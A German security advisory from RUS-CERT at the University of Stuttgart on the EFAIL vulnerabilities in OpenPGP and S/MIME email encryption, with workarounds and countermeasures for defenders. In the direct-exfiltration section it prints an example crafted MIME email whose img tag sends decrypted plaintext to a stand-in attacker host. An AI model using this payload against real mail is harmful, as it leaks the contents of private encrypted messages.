EFAIL - Schwachstelle bei GnuPG und S/MIME
(2018-05-14 21:08:22.619278+00)
Quelle:
https://efail.de/Forscher der Fachhochschule Münster, der Ruhr-Universität Bochum und der belgischen Universität Leuven haben Schwachstellen in OpenPGP und S/MIME entdeckt. Angreifer können aktive Inhalte von verschlüsselten E-Mails im HTML-Format, mit denen beispielsweise Bilder aus dem Internet nachgeladen werden können, ausnutzen, um an den Klartext der verschlüsselten Nachrichten zu gelangen. Administratoren und Benutzern, die OpenPGP oder S/MIME zur verschlüsselten Kommunikation verwenden, wird empfohlen, die Anzeige von HTML-Mails oder zumindest aktive Inhalte und das automatische Nachladen von Inhalten, wie bspw. Bilder aus dem Internet, in ihrem E-Mail-Programm zu deaktivieren.
Inhalt
- Zusammenfassung
- Beschreibung
- Workaround
- Gegenmaßnahmen
- Vulnerability ID
- Exploit Status
- Weitere Information zu diesem Thema
- Revisionen dieser Meldung
Zusammenfassung
- CVE-2017-17688, CVE-2017-17689
Betroffen: OpenPGP und S/MIME, die bei der Entschlüsselung von Nachrichten durch das Mailprogramm aufgerufen werden und die deren Ergebnis unmittelbar darstellen Plattform: alle (generic) Einfallstor: HTML-Email-Nachricht Angriffsvoraussetzung: Zugriff auf die verschlüsselte Nachricht Angriffsvektorklasse: remote Auswirkung: Informationsleck Typ: Entwurfsfehler Gefahrenpotential: je nach geschützter Information in der Nachricht: bis sehr hoch Workaround: Abschaltung von HTML und aktiven Inhalten Gegenmaßnahmen: neue Version, sobald verfügbar Vulnerability ID: CVE-2017-17688, CVE-2017-17689
Beschreibung
Die EFAIL genannte Schwachstelle betrifft sowohl Mängel in den Standards OpenPGP und S/MIME als auch in deren Implementierungen in zahlreichen E-Mail-Clients, die HTML-Nachrichten darstellen können. Diese können sich Angreifer zunutze machen, um verschlüsselte Daten im Klartext zu erbeuten.
Der Angriff läuft vereinfacht wie folgt ab:
- Der Angreifer muss in den Besitz der verschlüsselten E-Mail-Nachricht gelangen, idealerweise bevor diese den Empfänger erreicht, zumindest aber bevor dieser sie entschlüsselt. Dies kann z.B. durch einen Mittelsmannangriff erfolgen, bei der die Nachricht auf dem Weg, z.B. auf einem vermittelnden Mailserver abgefangen und nach den gewünschten Aktionen weitergeleitet wird. Sofern die Nachricht verschlüsselt in einem Postfach liegt, auf das der Angreifer Zugriff hat, und diese vom Besitzer nur temporär zum Lesen entschlüsselt wird, kann er die Nachricht auch dort manipulieren.
- Die abgefangene, verschlüsselte Nachricht manipuliert der Angreifer, indem er
- einen Rückkanal in den unverschlüsselten MIME-Teil der E-Mail einbaut (direct exfiltration, s.u.), oder
- einen Rückkanal in den verschlüsselten Teil der E-Mail mit Hilfe eines CBC/CFB-Angriff injiziert (malleability gadgets, s.u.).
- Der Client des Empfängers entschlüsselt die E-Mail und der Klartext wird über den eingebauten Rückkanal dem Angreifer übermittelt.
a) Direkte Exfiltration
Die direkte Exfiltration macht sich Schwächen von E-Mail-Clients zunutze. Bei Clients, die verschiedene MIME-Teile einer Mail nicht voneinander isolieren, lässt sich der Ciphertext quasi in den Rückkanal einbetten, indem man es beispielsweise in <img> </img> Tags einschließt:
From: attacker@efailattack.com To: victim@university.com Content-Type: multipart/mixed;boundary="BOUNDARY" --BOUNDARY Content-Type: text/html <img src="http://efailattack.com/ --BOUNDARY Content-Type: application/x-pkcs7-mime; smime-type="enveloped-data" Content-Description: S/MIME Encrypted Message Content-Transfer-Encoding: base64 7Na42pk1zagwggG5AgEAMIGgMIGUMQswCQYDVQQGEwJERTESMBAGA1UEBxMJU3R1dHR HQYDVQQKExZVbml2ZXJzaXRhZXQgU3R1dHRnYXJ0MSgwJgYDVQQDEx9Vbml2ZXJzaXR dHRnYXJ0IENBIC0gRzAxMSYwJAYJKoZIhvcNAQkBFhdjYS1nMDFAdW5pLXN0dXR0... --BOUNDARY Content-Type: text/html "> --BOUNDARY--so dass der Klartext dann Teil des HTML-Elements zum Nachladen des (vermeintlichen) Bildes wird:
<img src="http://efailattack.com/Mein-ganz-geheimer-Geheimtext">Der Rückkanal entsteht in diesem Fall durch die Anzeige der entschlüsselten E-Mail im HTML-Format durch das Mailprogramm. Weil ihm durch die oben genannten
<img>-Tags mitgeteilt wird, dass vermeintlich ein Bild dargestellt werden soll, schickt es einen HTTP-Request an den Server des Angreifers mit dem entschlüsselten Text als Bestandteil des URLs, um dieses nachzuladen. Der Server loggt jede Anfrage mit dem gesamten URL. So erhält der Angreifer den Klartext als Teil des Requests.
b) CBC/CFB-Angriff
Beim CBC/CFB-Angriff werden Schwächen in den Verschlüsselungsstandards und ihren Implementierungen ausgenutzt. Besonders problematisch ist die fehlende oder unzureichende Integritätsprüfung des Chiffrats vor der Entschlüsselung. So kann ein entsprechender Rückkanal in das Chiffrat eingebettet werden, ohne dass die Implementierung bei der Entschlüsselung einen Fehler meldet oder das Mailprogramm in entsprechend richtiger Weise auf eine entsprechende Fehlermeldung reagiert.
OpenPGP schneidet dank des Einsatzes von Modification Detection Codes (MDC) gegenüber S/MIME hier besser ab, insofern MDC nicht umgangen bzw. der E-Mail-Client auf Integritätsfehler richtig reagieren kann. Allgemein gestalten sich außerdem Angriffe auf OpenPGP-verschlüsselte Nachrichten wegen der eingesetzten Kompression komplexer.
Workaround
Als Sofortmaßnahme sollte die Exfiltration durch das Blockieren der Rückkanäle unterbunden werden.
Benutzern, die OpenPGP oder S/MIME zur verschlüsselten Kommunikation verwenden, wird dringend Folgendes empfohlen:
- Abschaltung der Anzeige von Mails im HTML-Format und/oder
- Abschaltung aktiver Inhalte und das automatische Nachladen von Inhalten aus externen Quellen, z.B. Bilder aus dem Internet, in ihrem E-Mail-Client
- Alternativ kann die Entschlüsselung der Nachrichten durch das Kopieren und Einfügen in ein separates, vom Mail-Client verschiedenes Programm durchgeführt werden.
- Um Empfängern eigener Nachrichten diese Maßnahmen ebenfalls zu erleichtern, sollte auch das Editieren und Versenden von eigenen Nachrichten im HTML-Format abgeschaltet werden.
Gegenmaßnahmen
Es existieren derzeit keine Patches für die eingesetzte Software.
Um die Schwachstellen ursächlich zu beseitigen, müssen die Standards OpenPGP und S/MIME und deren Implementierungen verbessert werden. Das betrifft vor allem die korrekte Integritätsprüfung des Ciphertextes etwa mit authentifizierten Verschlüsselungsmodi für Blockchiffren, sprich Authenticated Encryption with Associated Data (AEAD); bei OpenPGP die Verbesserung von MDC.
Vulnerability ID
Weitere Information zu diesem Thema
- EFAIL Homepage
- Aufsatz zum EFAIL-Angriff
- Blogpost von Werner Koch zu EFAIL und GnuPG
- golem.de: Angreifer können sich entschlüsselte E-Mails schicken lassen, informativer und verständlicher Artikel von Hanno Böck
- Hinweise des RUS-CERT zu HTML und aktiven Inhalten in E-Mail-Nachrichten
Exploit Status
- Derzeit sind keine erfolgreichen Angriffe bekannt
Revisionen dieser Meldung
- V 1.0 (2018-05-14): veröffentlicht
- V 1.1 (2018-05-15): CVE-Nummern hinzugefügt
- V 1.2 (2018-05-15): Bibliographie erweitert
Hinweis
Die in diesem Text enthaltene Information wurde für die Mitglieder der Universität Stuttgart recherchiert und zusammengestellt. Die Universität Stuttgart übernimmt keinerlei Haftung für die Inhalte. Dieser Artikel darf ausschließlich in unveränderter Form und nur zusammen mit diesem Hinweis sowie dem folgenden Copyrightverweis veröffentlicht werden. Eine Veröffentlichung unter diesen Bedingungen an anderer Stelle ist ausdrücklich gestattet.
Copyright © 2022 RUS-CERT, Universität Stuttgart, https://cert.uni-stuttgart.de/
https://cert.uni-stuttgart.de/ticker/article.php?mid=1750